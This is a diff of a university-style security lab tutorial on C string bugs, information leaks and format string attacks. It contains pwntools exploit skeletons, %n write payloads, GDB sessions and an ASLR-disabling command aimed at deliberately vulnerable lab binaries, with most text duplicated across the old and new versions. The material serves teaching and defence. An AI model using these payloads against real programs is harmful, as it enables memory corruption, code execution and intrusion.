'print("%08x\n" * 10000)')" -``` - -Depending on your setup you should be able to view the hex -representation of the string "%08x\\n". - -**Why do we need our own buffer?** Remember the `%n` format? It can be used to write at an address given as parameter. The idea is to give this address as parameter and achieve memory writing. We will see later how to control the value. - -The next steps are done with ASLR disabled. In order to disable ASLR, -please run - -``` {.code .bash} -echo 0 | sudo tee /proc/sys/kernel/randomize_va_space -``` - -By trial and error or by using GDB (breakpoint on `printf`) we can determine where the buffer starts - -``` {.code .bash} -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"%08x\n " * 0x300)')" | grep -n 41 | head -10: ffffc410 -52: ffffcc41 -72: ffffcf41 -175: 44434241 -``` - - -Command line Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference pwntools script to write your exploit. The code is equivalent to the above one-liner. - -``` {.code .python} -#!/usr/bin/env python3 -  -from pwn import * -  -stack_items = 200 -  -pad = b"ABCD" -val_fmt = b"%08x\n " -# add a \n at the end for consistency with the command line run -fmt = pad + val_fmt * stack_items + b"\n" -  -io = process(["./format", fmt]) -  -io.interactive() -``` - -Then call the `format` using: - -``` {.code} -$ python exploit.py -``` - -One idea is to keep things in multiple of 4, like "%08x \\n". If you are looking at line `175` we have `44434241` which is the base 16 representation of `“ABCD”` (because it\'s little endian). Note, you can add as many format strings you want, the start of the buffer will be the same (more or less). - -We can compress our buffer by specifying the position of the argument. - -``` {.code .bash} -$ ./format $(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08x")') -ABCDAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAA44434241 -This is the most useless and insecure program! -``` - - -`b”AAAAAAAA” * 199` is added to maintain the length of the original string, otherwise the offset might change. - - -You can see that the last information is our b"ABCD" string printed with `%08x` this means that we know where our buffer is. - - -You need to enable core dumps in order to reproduce the steps below: - -``` {.code} -$ ulimit -c unlimited -``` - -The steps below work an a given version of libc and a given system. It\'s why the instruction that causes the fault is - -``` {.code} -mov %edx,(%eax) -``` - -or the equivalent in Intel syntax - -``` {.code} -mov DWORD PTR [eax], edx -``` - -It may be different on your system, for example `edx` may be replaced by `esi`, cuch as - -``` {.code} -mov DWORD PTR [eax], esi -``` - -Update the explanations below accordingly. - -Remove any core files you may have generated before testing yourprogram: - -``` {.code} -rm -f core -``` - -We can replace `%08x` with `%n` this should lead to segmentation fault. - -``` {.code .bash} -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08n")')" -Segmentation fault (core dumped) -$ gdb ./format -c core -... -Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. -Program terminated with signal 11, Segmentation fault. -#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 -(gdb) bt -#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 -#1 0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6 -#2 0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18 -(gdb) x/i $eip -=> 0xf7e580a2 : mov %edx,(%eax) -(gdb) info registers $edx $eax -edx 0x202 1596 -eax 0x44434241 1145258561 -(gdb) quit -``` - -Bingo. We have memory write. The vulnerable code tried to write at the address `0x44434241` ("ABCD" little endian) the value 1596. The value 1596 is the amount of data wrote so far by `printf`(`“ABCD” + 199 * “AAAAAAAA”`). - -Right now, our input string has 1605 bytes (1604 with a `\n` at the end). But we can further compress it, thus making the value that we write independent of the length of the input. - -``` {.code .bash} -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write("ABCD" + "A" * 1588 + "%99x" + "%126$08n")')" -Segmentation fault (core dumped) -$ gdb ./format -c core -(gdb) info registers $edx $eax -edx 0x261 1691 -eax 0x44434241 1145258561 -(gdb) quit -``` - -Here we managed to write 1691 (4+1588+99). Note we should keep the number of bytes before the format string the same. Which means that if we want to print with a padding of 100 (three digits) we should remove one `A`. You can try this by yourself. - -**How far can we go?** Probably we can use any integer for specifying the number of bytes which are used for a format, but we don\'t need this; moreover specifying a very large padding is not always feasible, think what happens when printing with `snprintf`. 255 should be enough. - -Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 bytes at a time we can make use of the endianess of the machine. **The idea** is to write at the address n and then at the address n+1 and so on. - -Lets first display the address. We are using the address `0x804c014`. This address is the address of the got entry for the puts function. Basically, we will override the got entry for the puts. - -Check the `exploit.py` script from the task directory, read the commends and understand what it does. - -``` {.code .bash} -$ python exploit.py -[*] 'format' - Arch: i386-32-little - RELRO: Partial RELRO - Stack: No canary found - NX: NX enabled - PIE: No PIE (0x8048000) -[+] Starting local process './format': pid 29030 -[*] Switching to interactive mode -[*] Process './format' stopped with exit code 0 (pid 29030) -\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... -This is the most useless and insecure program! -``` - -The output starts with `\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018` which is the 4 addresses we have written (raw, little endian) followed by the numerical prints done with `%x` of the same addresses. - -If you have the same output it means that now, if you replace `%x` with `%n` (change `fmt = write_fmt` in the script) it will try to write something at those valid addresses. - -We want to put the value `0x080491a6`. - -``` {.code .bash} -$ objdump -d ./format | grep my_evil -080491a6 : -``` - - -As `%n` writes how many characters have been printed until it is reached, each `%n` will print an incrementally larger value. We use the 4 adjacent adressess to write byte by byte and use overflows to reach a lower value for the next byte. For example, after writing `0xa6` we can write `0x0191`: - -![](https://ocw.cs.pub.ro/courses/_media/cns/labs/bytes_write.png) - -Also, the `%n` count doesn\'t reset so, if we want to write `0xa6` and then `0x91` the payload should be in the form of: - -`<0xa6 bytes>%n<0x100 - 0xa6 + 0x91 bytes>%n` - -As mentioned earlier above, instead writing N bytes `“A” * N` you can use other format strings like `%Nc` or `%Nx` to keep the payload shorter. - - -Bonus task** Can you get a shell? (Assume ASLR is disabled). - -#### Mitigation and Recommendations ------------------------------- - - -1. Manage the string length carefully - - -2. Don\'t use `gets`. With `gets` there is no way of knowing how much data was read - - -3. Use string functions with `n` parameter, whenever a non constant string is involved. i.e. `strnprintf`, `strncat`. - - -4. Make sure that the `NUL` byte is added, for instance `strncpy` does **not** add a `NUL` byte. - - -5. Use `wcstr*` functions when dealing with wide char strings. - -6. Don\'t trust the user! - - -#### Real life Examples ------------------- - -- [Heartbleed](http://xkcd.com/1354/ "http://xkcd.com/1354/") -Linux kernel through 3.9.4 [CVE-2013-2851](http://www.cvedetails.com/cve/CVE-2013-2851/ "http://www.cvedetails.com/cve/CVE-2013-2851/"). The fix is [here](http://marc.info/?l=linux-kernel&m=137055204522556&w=2 "http://marc.info/?l=linux-kernel&m=137055204522556&w=2"). More details [here](http://www.intelligentexploit.com/view-details-ascii.html?id=16609 "http://www.intelligentexploit.com/view-details-ascii.html?id=16609"). - -- Windows 7 [CVE-2012-1851](http://www.cvedetails.com/cve/CVE-2012-1851/ "http://www.cvedetails.com/cve/CVE-2012-1851/"). - -- Pidgin off the record plugin [CVE-2012-2369](http://www.cvedetails.com/cve/CVE-2012-2369 "http://www.cvedetails.com/cve/CVE-2012-2369"). The fix is [here](https://bugzilla.novell.com/show_bug.cgi?id=762498#c1 "https://bugzilla.novell.com/show_bug.cgi?id=762498#c1") - -### Resources ---------- -[Secure Coding in C and C++](http://www.cert.org/books/secure-coding/ "http://www.cert.org/books/secure-coding/") -[String representation in C](http://www.informit.com/articles/article.aspx?p=2036582 "http://www.informit.com/articles/article.aspx?p=2036582") -[Improper string length checking](https://www.owasp.org/index.php/Improper_string_length_checking "https://www.owasp.org/index.php/Improper_string_length_checking") -[Format String definition](http://cwe.mitre.org/data/definitions/134.html "http://cwe.mitre.org/data/definitions/134.html") -[Format String Attack (OWASP)](https://www.owasp.org/index.php/Format_string_attack "https://www.owasp.org/index.php/Format_string_attack") -[Format String Attack (webappsec)](http://projects.webappsec.org/w/page/13246926/Format%20String "http://projects.webappsec.org/w/page/13246926/Format%20String") -[strlcpy and strlcat - consistent, safe, string copy and concatenation.](http://www.gratisoft.us/todd/papers/strlcpy.html "http://www.gratisoft.us/todd/papers/strlcpy.html") - This resource is useful to understand some of the string manipulation problems. - ------------------------------------------------------------------------- - -Except where otherwise noted, content on this page is licensed under the -following license: [CC Attribution-Share Alike 4.0 International](https://creativecommons.org/licenses/by-sa/4.0/deed.en) +# Information Leaks + +## Introduction + +### Objectives & Rationale + +This is a tutorial based lab. +Throughout this lab you will learn about frequent errors that occur when handling strings. +This tutorial is focused on the C language. +Generally, OOP languages (like Java, C#,C++) are using classes to represent strings -- this simplifies the way strings are handled and decreases the frequency of programming errors. + +### What is a String? + +Conceptually, a string is sequence of characters. +The representation of a string can be done in multiple ways. +One of the way is to represent a string as a contiguous memory buffer. +Each character is **encoded** in a way. +For example the **ASCII** encoding uses 7-bit integers to encode each character -- because it is more convenient to store 8-bits at a time in a byte, an ASCII character is stored in one byte. + +The type for representing an ASCII character in C is `char` and it uses one byte. +As a side note, `sizeof(char) == 1` is the only guarantee that the [C standard](http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf "http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf") gives. + +Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). +The idea is that in order to represent an Unicode string, **more than one** byte is needed for **one** character. +`char16_t`, `char32_t` were introduced in the C standard to represent these strings. +The C language also has another type, called `wchar_t`, which is implementation defined and should not be used to represent Unicode characters. + +Our tutorial will focus on ASCII strings, where each character is represented in one byte. +We will show a few examples of what happens when one calls *string manipulation functions* that are assuming a specific encoding of the string. + +You will find extensive information on ASCII in the [ascii man page](http://man7.org/linux/man-pages/man7/ascii.7.html "http://man7.org/linux/man-pages/man7/ascii.7.html"). + +Inside an Unix terminal issue the command + +```console +man ascii +``` + +### Length Management + +In C, the length of an ASCII string is given by its contents. +An ASCII string ends with a `0` value byte called the `NUL` byte. +Every `str*` function (i.e. a function with the name starting with `str`, such as `strcpy`, `strcat`, `strdup`, `strstr` etc.) uses this `0` byte to detect where the string ends. +As a result, not ending strings in `0` and using `str*` functions leads to vulnerabilities. + +## 1. Basic Info Leak (tutorial) + +Enter the `01-basic-info-leak/` subfolder. +It's a basic information leak example. + +In `basic_info_leak.c`, `buf` is supplied as input, hence is not trusted. +We should be careful with this buffer. +If the user gives `32` bytes as input then `strcpy` will copy bytes in `my_string` until it finds a `NUL` byte (`0x00`). +Because the [stack grows down](/courses/cns/labs/lab-05 "cns:labs:lab-05"), on most platforms, we will start accessing the content of the stack. +After the `buf` variable the stack stores the `old rbp`, the function return address and then the function parameters. +This information is copied into `my_string`. +As such, printing information in `my_string` (after byte index `32`) using `puts()` results in information leaks. + +We can test this using: + +```console +$ python -c 'print("A"*32)' | ./basic_info_leak +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�8� +``` + +In order to check the hexadecimal values of the leak, we pipe the output +through `xxd`: + +```console +$ python -c 'print("A"*32)' | ./basic_info_leak | xxd +00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000020: d066 57b4 fc7f 0a .fW.... +``` + +We have leaked one value above: + +- the lower non-0 bytes of the old/stored `rbp` value (right after the buffer) +- `0x7ffcb45766d0` (it's a little endian architecture); + it will differ on your system + +The return address usually doesn't change (except for executables with PIE, *Position Independent Executable* support). +But assuming ASLR is enabled, the `rbp` value changes at each run. +If we leak it we have a basic address that we can toy around to leak or overwrite other values. + +## 2. Information Leak + +We will now show how improper string handling will lead to information leaks from the memory. +For this, please access the `02-info-leak/` subfolder. +Please browse the `info-leak.c` source code file. + +The snippet below is the relevant code snippet. +The goal is to call the `my_evil_func()` function. +One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. +If you have memory writes, then getting code execution is a matter of getting things right. +In this task we are assuming that we have memory write (i.e. we can write any value at any address). +You can call the `my_evil_func()` function by overriding the return address of the `my_main()` function: + +```c +#define NAME_SZ 32 +  +static void read_name(char *name) +{ + memset(name, 0, NAME_SZ); + read(0, name, NAME_SZ); + //name[NAME_SZ-1] = 0; +} +  +static void my_main(void) +{ + char name[NAME_SZ]; +  + read_name(name); + printf("hello %s, what address to modify and with what value?\n", name); + fflush(stdout); + my_memory_write(); + printf("Returning from main!\n"); +} +``` + +What catches our eye is that the `read()` function call in the `read_name()` function read **exactly** `32` bytes. +If we provide it `32` bytes it won't be null-terminated and will result in an information leak when `printf()` is called in the `my_main()` function. + +### Exploiting the Memory Write Using the Info Leak + +Let's first try to see how the program works: + +```console +$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak +hello AAAAAAAAAA, what address to modify and with what value? +``` + +The binary wants an input from the user using the `read()` library call as we can see below: + +```console +$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak +read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512 +read(0, "AAAAAAAAAA", 32) = 10 +hello AAAAAAAAAA, what address to modify and with what value? +read(0, "", 4) = 0 ++++ exited with 255 +++ +``` + +The input is read using the `read()` system call. +The first read expects 32 bytes. +You can see already that there's another `read()` call. +That one is the first `read()` call in the `my_memory_write()` function. + +As noted above, if we use exactly `32` bytes for name we will end up with a non-null-terminated string, leading to an information leak. +Let's see how that goes: + +```console +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak +hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value? +  +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd +00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141 hello AAAAAAAAAA +00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA +00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh +00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f at address to mo +00000040: 6469 6679 2061 6e64 2077 6974 6820 7768 dify and with wh +00000050: 6174 2076 616c 7565 3f0a at value?. +``` + +We see we have an information leak. +We leak one piece of data above: `0x7fffffffdcf0`. +If we run multiple times we can see that the values for the first piece of information differs: + +```console +$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ',' +00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh +``` + +The variable part is related to a stack address (it starts with `0x7f`); +it varies because ASLR is enabled. +We want to look more carefully using GDB and figure out what the variable value represents: + +```console +$ gdb -q ./info_leak +Reading symbols from ./info_leak...done. +gdb-peda$ b my_main +Breakpoint 1 at 0x400560 +gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")') +Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")') +[...] +  +# Do next instructions until after the call to printf. +gdb-peda$ ni +.... +  +gdb-peda$ x/12g name +0x7fffffffdc20: 0x4141414141414141 0x4141414141414141 +0x7fffffffdc30: 0x4141414141414141 0x4141414141414141 +0x7fffffffdc40: 0x00007fffffffdc50 0x00000000004007aa +gdb-peda$ x/2i 0x004007aa + 0x4007aa : mov edi,0x4008bc + 0x4007af : call 0x400550 +gdb-peda$ pdis main +Dump of assembler code for function main: + 0x00000000004007a1 <+0>: push rbp + 0x00000000004007a2 <+1>: mov rbp,rsp + 0x00000000004007a5 <+4>: call 0x400756 + 0x00000000004007aa <+9>: mov edi,0x4008bc + 0x00000000004007af <+14>: call 0x400550 + 0x00000000004007b4 <+19>: mov eax,0x0 + 0x00000000004007b9 <+24>: pop rbp + 0x00000000004007ba <+25>: ret +End of assembler dump. +gdb-peda$ +``` + +From the GDB above, we determine that, after our buffer, there is the stored `rbp` (i.e. old rbp). + +In 32-bit program there would (usually) be 2 leaked values: + +1. The old `ebp` +1. The return address of the function + +This happens if the values of the old `ebp` and the return address don't have any `x00` bytes. + +In the 64-bit example we only get the old `rbp` because the 2 high bytes of the stack address are always `0` which causes the string to be terminated early. + +When we leak the two values we are able to retrieve the stored `rbp` value. +In the above run the value of `rbp` is `0x00007fffffffdc50`. +We also see that the stored `rbp` value is stored at **address** `0x7fffffffdc40`, which is the address current `rbp`. +We have the situation in the below diagram: + +![Stak Information Leak](https://ocw.cs.pub.ro/courses/_media/cns/labs/info-leak-stack-64.png) + +We marked the stored `rbp` value (i.e. the frame pointer for `main()`: `0x7fffffffdc50`) with the font color red in both places. + +In short, if we leak the value of the stored `rbp` (i.e. the frame pointer for `main()`: `0x00007fffffffdc50`) we can determine the address of the current `rbp` (i.e. the frame pointer for `my_main()`: `0x7fffffffdc40`), by subtracting `16`. +The address where the `my_main()` return address is stored (`0x7fffffffdc48`) is computed by subtracting `8` from the leaked `rbp` value. +By overwriting the value at this address we will force an arbitrary code execution and call `my_evil_func()`. + +In order to write the return address of the `my_main()` function with the address of the `my_evil_func()` function, make use of the conveniently (but not realistically) placed `my_memory_write()` function. +The `my_memory_write()` allows the user to write arbitrary values to arbitrary memory addresses. + +Considering all of this, update the `TODO` lines of the `exploit.py` script to make it call the `my_evil_func()` function. + +Same as above, use `nm` to determine address of the `my_evil_func()` function. +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. +The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). + +Use the above logic to determine the `old rbp` leak and then the address of the `my_main()` return address. + +See [here](https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack "https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack") examples of using the `unpack()` function. + +In case of a successful exploit the program will spawn a shell in the `my_evil_func()` function, same as below: + +```console +$ python exploit.py +[!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead +[+] Starting local process './info_leak': pid 6422 +[*] old_rbp is 0x7fffffffdd40 +[*] return address is located at is 0x7fffffffdd38 +[*] Switching to interactive mode +Returning from main! +$ id +uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) +``` + +The rule of thumb is: **Always know your string length.** + +### Format String Attacks + +We will now see how (im)proper use of `printf` may provide us with ways of extracting information or doing actual attacks. + +Calling `printf` or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called **format string attack**. + +The definition of `printf`: + +```c +int printf(const char *format, ...); +``` + +Let's recap some of [useful formats](http://www.cplusplus.com/reference/cstdio/printf/ "http://www.cplusplus.com/reference/cstdio/printf/"): + +- `%08x` -- prints a number in hex format, meaning takes a number from the stack and prints in hex format +- `%s` -- prints a string, meaning takes a pointer from the stack and prints the string from that address +- `%n` -- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). +This format is not widely used but it is in the C standard. +- `%x` and `%n` are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user. + +## Example 2 + +```c +printf(my_string); +``` + +The above snippet is a good example of why ignoring compile time warnings is dangerous. +The given example is easily detected by a static checker. + +Try to think about: + +- The peculiarities of `printf` (variable number of arguments) +- Where `printf` stores its arguments (*hint*: on the stack) +- What happens when `my_string` is `"%x"` +- How matching between format strings (e.g. the one above) and arguments is enforced (*hint*: it's not) and what happens in general when the number of arguments doesn't match the number of format specifiers +- How we could use this to cause information leaks and arbitrary memory writes (*hint*: see the format specifiers at the beginning of the section) + +## Example 3 + +We would like to check some of the well known and not so-well known features of [the printf function](http://man7.org/linux/man-pages/man3/printf.3.html "http://man7.org/linux/man-pages/man3/printf.3.html"). +Some of them may be used for information leaking and for attacks such as format string attacks. + +Go into `printf-features/` subfolder and browse the `printf-features.c` file. +Compile the executable file using: + +```console +make +``` + +and then run the resulting executable file using + +```console +./printf-features +``` + +Go through the `printf-features.c` file again and check how print, length and conversion specifiers are used by `printf`. +We will make use of the `%n` feature that allows memory writes, a requirement for attacks. + +## Basic Format String Attack + +You will now do a basic format string attack using the `03-basic-format-string/` subfolder. +The source code is in `basic_format_string.c` and the executable is in `basic_format_string`. + +You need to use `%n` to overwrite the value of the `v` variable to `0x300`. +You have to do three steps: + +1. Determine the address of the `v` variable using `nm`. + +1. Determine the `n`-th parameter of `printf()` that you can write to using `%n`. + The `buffer` variable will have to be that parameter; + you will store the address of the `v` variable in the `buffer` variable. + +1. Construct a format string that enables the attack; + the number of characters processed by `printf()` until `%n` is matched will have to be `0x300`. + +For the second step let's run the program multiple times and figure out where the `buffer` address starts. +We fill `buffer` with the `aaaa` string and we expect to discover it using the `printf()` format specifiers. + +```console +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25 + +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a + +$ ./basic_format_string +AAAAAAAA +%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx +7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141 +``` + +In the last run we get the `4141414141414141` representation of `AAAAAAAA`. +That means that, if we replace the final `%lx` with `%n`, we will write at the address `0x4141414141414141` the number of characters processed so far: + +```console +$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c +162 +``` + +We need that number to be `0x300`. +You can fine tune the format string by using a construct such as `%32llx` to print a number on `32` characters instead of a maximum of `16` characters. +See how much extra room you need and see if you reach `0x300` bytes. + +The construct needn't use a multiple of `8` for length. +You may use the `%32llx` or `%33llx` or `%42llx`. +The numeric argument states the length of the print output. + +After the plan is complete, write down the attack by filling the `TODO` lines in the `exploit.py` solution skeleton. + +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. +The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). + +After you write 0x300 chars in v, you should obtain shell + +```console +$ python exploit64.py +[!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead +[+] Starting local process './basic_format_string': pid 20785 +[*] Switching to interactive mode + 7fffffffdcc0 7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25 +$ +``` + +## Extra: Format String Attack + +Go to the `04-format-string/` subfolder. +In this task you will be working with a **32-bit binary**. + +The goal of this task is to call `my_evil_func` again. +This task is also tutorial based. + +```c +int main(int argc, char *argv[]) +{ + printf(argv[1]); + printf("\nThis is the most useless and insecure program!\n"); + return 0; +} +``` + +### Transform Format String Attack to a Memory Write + +Any string that represents a useful format (e.g. `%d`, `%x` etc.) can be used to discover the vulnerability. + +```console +$ ./format "%08x %08x %08x %08x" +00000000 f759d4d3 00000002 ffd59bd4 +This is the most useless and insecure program! +``` + +The values starting with 0xf are very likely pointers. +Again, we can use this vulnerability as a information leakage. +But we want more. + +Another useful format for us is `%m$` followed by any normal format selector. +Which means that the `m`th parameter is used as an input for the following format. +`%10$08x` will print the `10`th parameter with `%08x`. +This allows us to do a precise access of the stack. + +Example: + +```console +$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x" +00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24 +This is the most useless and insecure program! +``` + +Note the equivalence between formats. +Now, because we are able to select *any* higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer. + +```console +./format "$(python -c 'print("%08x\n" * 10000)')" +``` + +Depending on your setup you should be able to view the hex +representation of the string "%08x\\n". + +**Why do we need our own buffer?** +Remember the `%n` format? +It can be used to write at an address given as parameter. +The idea is to give this address as parameter and achieve memory writing. +We will see later how to control the value. + +The next steps are done with ASLR disabled. +In order to disable ASLR, please run: + +```console +echo 0 | sudo tee /proc/sys/kernel/randomize_va_space +``` + +By trial and error or by using GDB (breakpoint on `printf`) we can determine where the buffer starts: + +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"%08x\n " * 0x300)')" | grep -n 41 | head +10: ffffc410 +52: ffffcc41 +72: ffffcf41 +175: 44434241 +``` + +Command line Python exploits tend to get very tedious and hard to read when the payload gets more complex. +You can use the following reference pwntools script to write your exploit. +The code is equivalent to the above one-liner. + +```python +#!/usr/bin/env python3 +  +from pwn import * +  +stack_items = 200 +  +pad = b"ABCD" +val_fmt = b"%08x\n " +# add a \n at the end for consistency with the command line run +fmt = pad + val_fmt * stack_items + b"\n" +  +io = process(["./format", fmt]) +  +io.interactive() +``` + +Then call the `format` using: + +```console +python exploit.py +``` + +One idea is to keep things in multiple of 4, like "%08x \\n". +If you are looking at line `175` we have `44434241` which is the base 16 representation of `“ABCD”` (because it's little endian). +Note, you can add as many format strings you want, the start of the buffer will be the same (more or less). + +We can compress our buffer by specifying the position of the argument. + +```console +$ ./format $(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08x")') +ABCDAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAA44434241 +This is the most useless and insecure program! +``` + +`b"AAAAAAAA" * 199` is added to maintain the length of the original string, otherwise the offset might change. + +You can see that the last information is our b"ABCD" string printed with `%08x` this means that we know where our buffer is. + +You need to enable core dumps in order to reproduce the steps below: + +```console +ulimit -c unlimited +``` + +The steps below work an a given version of libc and a given system. +It's why the instruction that causes the fault is + +```asm +mov %edx,(%eax) +``` + +or the equivalent in Intel syntax + +```asm +mov DWORD PTR [eax], edx +``` + +It may be different on your system, for example `edx` may be replaced by `esi`, cuch as + +```asm +mov DWORD PTR [eax], esi +``` + +Update the explanations below accordingly. + +Remove any core files you may have generated before testing yourprogram: + +```console +rm -f core +``` + +We can replace `%08x` with `%n` this should lead to segmentation fault. + +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08n")')" +Segmentation fault (core dumped) + +$ gdb ./format -c core +... +Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. +Program terminated with signal 11, Segmentation fault. +#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 +(gdb) bt +#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 +#1 0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6 +#2 0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18 +(gdb) x/i $eip +=> 0xf7e580a2 : mov %edx,(%eax) +(gdb) info registers $edx $eax +edx 0x202 1596 +eax 0x44434241 1145258561 +(gdb) quit +``` + +Bingo. +We have memory write. +The vulnerable code tried to write at the address `0x44434241` ("ABCD" little endian) the value 1596. +The value 1596 is the amount of data wrote so far by `printf`(`“ABCD” + 199 * “AAAAAAAA”`). + +Right now, our input string has 1605 bytes (1604 with a `n` at the end). +But we can further compress it, thus making the value that we write independent of the length of the input. + +```console +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write("ABCD" + "A" * 1588 + "%99x" + "%126$08n")')" +Segmentation fault (core dumped) + +$ gdb ./format -c core +(gdb) info registers $edx $eax +edx 0x261 1691 +eax 0x44434241 1145258561 +(gdb) quit +``` + +Here we managed to write `1691` (`4+1588+99`). +Note we should keep the number of bytes before the format string the same. +Which means that if we want to print with a padding of 100 (three digits) we should remove one `A`. +You can try this by yourself. + +**How far can we go?** +Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; +moreover specifying a very large padding is not always feasible, think what happens when printing with `snprintf`. +`255` should be enough. + +Remember, we want to write a value to a certain address. +So far we control the address, but the value is somewhat limited. +If we want to write 4 bytes at a time we can make use of the endianness of the machine. +**The idea** is to write at the address n and then at the address n+1 and so on. + +Lets first display the address. +We are using the address `0x804c014`. +This address is the address of the got entry for the puts function. +Basically, we will override the got entry for the puts. + +Check the `exploit.py` script from the task directory, read the commends and understand what it does. + +```console +$ python exploit.py +[*] 'format' + Arch: i386-32-little + RELRO: Partial RELRO + Stack: No canary found + NX: NX enabled + PIE: No PIE (0x8048000) +[+] Starting local process './format': pid 29030 +[*] Switching to interactive mode +[*] Process './format' stopped with exit code 0 (pid 29030) +\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... +This is the most useless and insecure program! +``` + +The output starts with `\x14\x04\x15\x04\x17\x04\x18\x04 804c014 804c015 804c017 804c018` which is the 4 addresses we have written (raw, little endian) followed by the numerical prints done with `%x` of the same addresses. + +If you have the same output it means that now, if you replace `%x` with `%n` (change `fmt = write_fmt` in the script) it will try to write something at those valid addresses. + +We want to put the value `0x080491a6`. + +```console +$ objdump -d ./format | grep my_evil +080491a6 : +``` + +As `%n` writes how many characters have been printed until it is reached, each `%n` will print an incrementally larger value. 